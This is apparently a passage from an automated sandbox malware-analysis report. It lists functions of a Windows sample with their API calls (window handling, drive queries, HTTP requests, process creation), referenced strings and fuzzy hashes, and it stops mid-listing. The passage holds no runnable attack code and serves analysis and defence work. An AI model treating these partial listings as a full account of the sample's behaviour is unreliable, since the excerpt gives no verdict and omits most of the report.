Opcode Fuzzy Hash: e24aa8a35aa4bd79d5bf97e43f64d4cb540e8ad1add906a84e01c2ec1b1ca64a
Instruction Fuzzy Hash: BD810B71604625BBDB24BF65EC46FEF37A9AF26300F044024F905AB1D6EB70DA62C791

Uniqueness

Uniqueness Score: -1.00%

Function 00193E79 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00193EF8
_wcslen.LIBCMT ref: 00193F03
_wcslen.LIBCMT ref: 00193F5A
_wcslen.LIBCMT ref: 00193F98
GetDriveTypeW.KERNEL32(?), ref: 00193FD6
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0019401E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00194059
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00194087

Strings

set cd door , xrefs: 00194028
open, xrefs: 00193F54, 00193F59
close, xrefs: 00193EFE, 00193F18
type cdaudio alias cd wait, xrefs: 00194001
close cd wait, xrefs: 00194072
open , xrefs: 00193FE5
wait, xrefs: 00194044
closed, xrefs: 00193F08, 00193F2D, 00193F46, 00193F7E, 00193F97

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 7375e924b37c94365493da57fd9bdd93ab16185036ae7fae0115b5c98f028bf1
Instruction ID: f83e1454ffa2cb95528175e05f6910c6a6c1f1770ed88885f211ba93e20117d8
Opcode Fuzzy Hash: 7375e924b37c94365493da57fd9bdd93ab16185036ae7fae0115b5c98f028bf1
Instruction Fuzzy Hash: BD71E1326042119FCB10DF24D88086EB7F4FFA8754F54492DF8A597291EB30ED46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00185A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00185A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00185A40
SetWindowTextW.USER32(?,?), ref: 00185A57
GetDlgItem.USER32(?,000003EA), ref: 00185A6C
SetWindowTextW.USER32(00000000,?), ref: 00185A72
GetDlgItem.USER32(?,000003E9), ref: 00185A82
SetWindowTextW.USER32(00000000,?), ref: 00185A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00185AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00185AC3
GetWindowRect.USER32(?,?), ref: 00185ACC
_wcslen.LIBCMT ref: 00185B33
SetWindowTextW.USER32(?,?), ref: 00185B6F
GetDesktopWindow.USER32 ref: 00185B75
GetWindowRect.USER32(00000000), ref: 00185B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00185BD3
GetClientRect.USER32(?,?), ref: 00185BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00185C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00185C2F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 5b4234344d08f6323e003444e38f94217d1e808fbbb3a3c7a3592e055eae2029
Instruction ID: bf9d211d377f09ac7396f5d8948ddc92b78461eb176a84f5ef5694d720a50a5c
Opcode Fuzzy Hash: 5b4234344d08f6323e003444e38f94217d1e808fbbb3a3c7a3592e055eae2029
Instruction Fuzzy Hash: BD715D31900B05AFDB20EFA8CE85AAEBBF6FF58705F104618E542A75A0D775AA44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0019FE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 0019FE27
LoadCursorW.USER32(00000000,00007F8A), ref: 0019FE32
LoadCursorW.USER32(00000000,00007F00), ref: 0019FE3D
LoadCursorW.USER32(00000000,00007F03), ref: 0019FE48
LoadCursorW.USER32(00000000,00007F8B), ref: 0019FE53
LoadCursorW.USER32(00000000,00007F01), ref: 0019FE5E
LoadCursorW.USER32(00000000,00007F81), ref: 0019FE69
LoadCursorW.USER32(00000000,00007F88), ref: 0019FE74
LoadCursorW.USER32(00000000,00007F80), ref: 0019FE7F
LoadCursorW.USER32(00000000,00007F86), ref: 0019FE8A
LoadCursorW.USER32(00000000,00007F83), ref: 0019FE95
LoadCursorW.USER32(00000000,00007F85), ref: 0019FEA0
LoadCursorW.USER32(00000000,00007F82), ref: 0019FEAB
LoadCursorW.USER32(00000000,00007F84), ref: 0019FEB6
LoadCursorW.USER32(00000000,00007F04), ref: 0019FEC1
LoadCursorW.USER32(00000000,00007F02), ref: 0019FECC
GetCursorInfo.USER32(?), ref: 0019FEDC
GetLastError.KERNEL32 ref: 0019FF1E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 93d2fa89dda4782cc7f0dfe3bba35aa27be95be8482096b1d7521075b07fe2c5
Instruction ID: 9627e818304906eb233a534789b3f714bdd75e61f0f9b1b9efb7845b9d120023
Opcode Fuzzy Hash: 93d2fa89dda4782cc7f0dfe3bba35aa27be95be8482096b1d7521075b07fe2c5
Instruction Fuzzy Hash: 7D4142B1D08319AADB10DFBA8C8985EBFE8FF04754B50452AE11DE7281DB78A901CE91

Uniqueness

Uniqueness Score: -1.00%

Function 001400C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001400C6

Part of subcall function 001400ED: InitializeCriticalSectionAndSpinCount.KERNEL32(001F070C,00000FA0,EDB3701A,?,?,?,?,001623B3,000000FF), ref: 0014011C
Part of subcall function 001400ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001623B3,000000FF), ref: 00140127
Part of subcall function 001400ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001623B3,000000FF), ref: 00140138
Part of subcall function 001400ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0014014E
Part of subcall function 001400ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0014015C
Part of subcall function 001400ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0014016A
Part of subcall function 001400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00140195
Part of subcall function 001400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001401A0

___scrt_fastfail.LIBCMT ref: 001400E7

Part of subcall function 001400A3: __onexit.LIBCMT ref: 001400A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00140122
kernel32.dll, xrefs: 00140133
SleepConditionVariableCS, xrefs: 00140154
InitializeConditionVariable, xrefs: 00140148
WakeAllConditionVariable, xrefs: 00140162

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: cd80648122bcf953de0310e24cdd07c8a6797054592d01924aaebb9c5b28ebe5
Instruction ID: 89a055f760e0abfb2420c068dbf870619500cc70f8b428b07e37c84a10152415
Opcode Fuzzy Hash: cd80648122bcf953de0310e24cdd07c8a6797054592d01924aaebb9c5b28ebe5
Instruction Fuzzy Hash: C8210B32A44710ABD7126BA9EC45B6933D4EF5CF61F010239FA01E36A2DB74DC408ED0

Uniqueness

Uniqueness Score: -1.00%

Function 001830F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0018318D
_wcslen.LIBCMT ref: 001831F8

Strings

TEXT, xrefs: 0018347C
REGEXPCLASS, xrefs: 00183255, 00183266
CLASS, xrefs: 00183188, 001831A5
CLASSNN, xrefs: 001831F3, 00183204
INSTANCE, xrefs: 00183453
NAME, xrefs: 00183335, 00183346

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 3aa04eabe468abd536a43eb70874367ca2aef9358e1e046a945b24c8db36af7a
Instruction ID: 5d28b5011e456921ff7f3f0701f4f17ba127413e9a8c46f16ceed6cbee7d369c
Opcode Fuzzy Hash: 3aa04eabe468abd536a43eb70874367ca2aef9358e1e046a945b24c8db36af7a
Instruction Fuzzy Hash: 64E1E631A00516ABCB18AF68C4517EEFBB1BF54B14F588129E466B7250DB30AF85DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001944C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,001BCC08), ref: 00194527
_wcslen.LIBCMT ref: 0019453B
_wcslen.LIBCMT ref: 00194599
_wcslen.LIBCMT ref: 001945F4
_wcslen.LIBCMT ref: 0019463F
_wcslen.LIBCMT ref: 001946A7

Part of subcall function 0013F9F2: _wcslen.LIBCMT ref: 0013F9FD

GetDriveTypeW.KERNEL32(?,001E6BF0,00000061), ref: 00194743

Strings

removable, xrefs: 001945EA, 001945EF
ramdisk, xrefs: 001946F1
network, xrefs: 0019469D, 001946A2
cdrom, xrefs: 0019458F, 00194594
unknown, xrefs: 00194708
all, xrefs: 00194531, 00194536
fixed, xrefs: 00194635, 0019463A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: b9dd493b40f147597e0b8e0e00e04f74b13ab7c7200104e0cf33f0be29e70de5
Instruction ID: 980a99a048fbd1f55ee340b37f61942f04407f9b3ba18bd41ce04070d26faa37
Opcode Fuzzy Hash: b9dd493b40f147597e0b8e0e00e04f74b13ab7c7200104e0cf33f0be29e70de5
Instruction Fuzzy Hash: 8EB122716083029FCB14DF28D890E6EB7E5BFA9764F50491DF496C7291E730D846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001AAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001AB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001AB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001AB1D4
_wcslen.LIBCMT ref: 001AB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001AB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001AB236
_wcslen.LIBCMT ref: 001AB332

Part of subcall function 001905A7: GetStdHandle.KERNEL32(000000F6), ref: 001905C6

_wcslen.LIBCMT ref: 001AB34B
_wcslen.LIBCMT ref: 001AB366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001AB3B6
GetLastError.KERNEL32(00000000), ref: 001AB407
CloseHandle.KERNEL32(?), ref: 001AB439
CloseHandle.KERNEL32(00000000), ref: 001AB44A
CloseHandle.KERNEL32(00000000), ref: 001AB45C
CloseHandle.KERNEL32(00000000), ref: 001AB46E
CloseHandle.KERNEL32(?), ref: 001AB4E3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 3e0e26e3f00d2ed1f0c4a91fb09ce94156d34e14df39724ffda45bfe141bfabb
Instruction ID: 903c751e10f1f599a70f49b9748536c486689b89c80ad6c1d28810594764d117
Opcode Fuzzy Hash: 3e0e26e3f00d2ed1f0c4a91fb09ce94156d34e14df39724ffda45bfe141bfabb
Instruction Fuzzy Hash: 6EF19D355083809FCB14EF24D891B6EBBE1BF9A314F14855DF4899B2A2CB31EC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0012326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(001F1990), ref: 00162F8D
GetMenuItemCount.USER32(001F1990), ref: 0016303D
GetCursorPos.USER32(?), ref: 00163081
SetForegroundWindow.USER32(00000000), ref: 0016308A
TrackPopupMenuEx.USER32(001F1990,00000000,?,00000000,00000000,00000000), ref: 0016309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001630A9

Strings

0, xrefs: 0012327D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 9309a7e52dfd1a10698a0d01848c58ab5c5445a2da85067cedd6f95c8bcb9bc9
Instruction ID: 6470d35e23de876912ff4b38d38f229ea15277370b7b6f508e2bed0614efe542
Opcode Fuzzy Hash: 9309a7e52dfd1a10698a0d01848c58ab5c5445a2da85067cedd6f95c8bcb9bc9
Instruction Fuzzy Hash: A9714930644616BFFB259F64DC89FAABF69FF05324F204216F5246A1E0C7B1AD60CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 001B6DEB

Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001B6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001B6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001B6E94
DestroyWindow.USER32(?), ref: 001B6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00120000,00000000), ref: 001B6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001B6EFD
GetDesktopWindow.USER32 ref: 001B6F16
GetWindowRect.USER32(00000000), ref: 001B6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001B6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001B6F4D

Part of subcall function 00139944: GetWindowLongW.USER32(?,000000EB), ref: 00139952

Strings

0, xrefs: 001B6D98
tooltips_class32, xrefs: 001B6E58, 001B6EDD

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 5c8e737f732f1099944c1bc6b48e346261289aa65e4ab8ddd00ccfdd46ea155d
Instruction ID: 622120c8db54105310bc1b113d5602ac6b470781af128875ecaa2b25b18defd9
Opcode Fuzzy Hash: 5c8e737f732f1099944c1bc6b48e346261289aa65e4ab8ddd00ccfdd46ea155d
Instruction Fuzzy Hash: 28717771504244AFDB21CF28DC58FBABBE9FBA9304F04051DF989872A1C774E946CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001B911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2

DragQueryPoint.SHELL32(?,?), ref: 001B9147

Part of subcall function 001B7674: ClientToScreen.USER32(?,?), ref: 001B769A
Part of subcall function 001B7674: GetWindowRect.USER32(?,?), ref: 001B7710
Part of subcall function 001B7674: PtInRect.USER32(?,?,001B8B89), ref: 001B7720

SendMessageW.USER32(?,000000B0,?,?), ref: 001B91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001B91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001B91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 001B9225
SendMessageW.USER32(?,000000B0,?,?), ref: 001B923E
SendMessageW.USER32(?,000000B1,?,?), ref: 001B9255
SendMessageW.USER32(?,000000B1,?,?), ref: 001B9277
DragFinish.SHELL32(?), ref: 001B927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001B9371

Strings

@GUI_DRAGFILE, xrefs: 001B9320
@GUI_DROPID, xrefs: 001B929E
@GUI_DRAGID, xrefs: 001B92E9

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 8e08a94390f037b9588d03b3cf504b8c82ed51c953067c5d552901e57107f1ac
Instruction ID: 8242514ac09cf838af79f331a35c836f1b8dd10e696dee823bf99616ca8ce54e
Opcode Fuzzy Hash: 8e08a94390f037b9588d03b3cf504b8c82ed51c953067c5d552901e57107f1ac
Instruction Fuzzy Hash: B6615971108301AFD701DF64DC85DAFBBE8FF99750F000A2EF695921A0DB709A59CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0019C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0019C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0019C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0019C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0019C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0019C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0019C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0019C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0019C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0019C5F0
InternetCloseHandle.WININET(00000000), ref: 0019C5FB

Strings

, xrefs: 0019C575

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: f8415f24a195d7c39be973c472f4d380979bb3f7c4974c332c19b8992b45e208
Instruction ID: 23f0532a927b58244630e10154cd3ef3e5ac50c44afef213c9035614d9fd7b35
Opcode Fuzzy Hash: f8415f24a195d7c39be973c472f4d380979bb3f7c4974c332c19b8992b45e208
Instruction Fuzzy Hash: 90514BB1600209BFEF218FA5C988AAB7BFCFF08754F014519F98696650DB34E944DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001B856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 001B8592
GetFileSize.KERNEL32(00000000,00000000), ref: 001B85A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 001B85AD
CloseHandle.KERNEL32(00000000), ref: 001B85BA
GlobalLock.KERNEL32(00000000), ref: 001B85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 001B85D7
GlobalUnlock.KERNEL32(00000000), ref: 001B85E0
CloseHandle.KERNEL32(00000000), ref: 001B85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001B85F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,001BFC38,?), ref: 001B8611
GlobalFree.KERNEL32(00000000), ref: 001B8621
GetObjectW.GDI32(?,00000018,000000FF), ref: 001B8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 001B8671
DeleteObject.GDI32(00000000), ref: 001B8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001B86AF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 05e3f23764e3de8ef0b510998d6e6f3a9302900f74c788e9cb9cf6b52044e191
Instruction ID: 51afe1f9a19e4b7de575d4cd6d6e344f96245cfa42fc72a206919312a9bf29b4
Opcode Fuzzy Hash: 05e3f23764e3de8ef0b510998d6e6f3a9302900f74c788e9cb9cf6b52044e191
Instruction Fuzzy Hash: 7641F775600209AFDB119FA9DC88EAA7BBCFF89B15F104259F909E7260DB709941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 001914BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00191502
VariantCopy.OLEAUT32(?,?), ref: 0019150B
VariantClear.OLEAUT32(?), ref: 00191517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001915FB
VarR8FromDec.OLEAUT32(?,?), ref: 00191657
VariantInit.OLEAUT32(?), ref: 00191708
SysFreeString.OLEAUT32(?), ref: 0019178C
VariantClear.OLEAUT32(?), ref: 001917D8
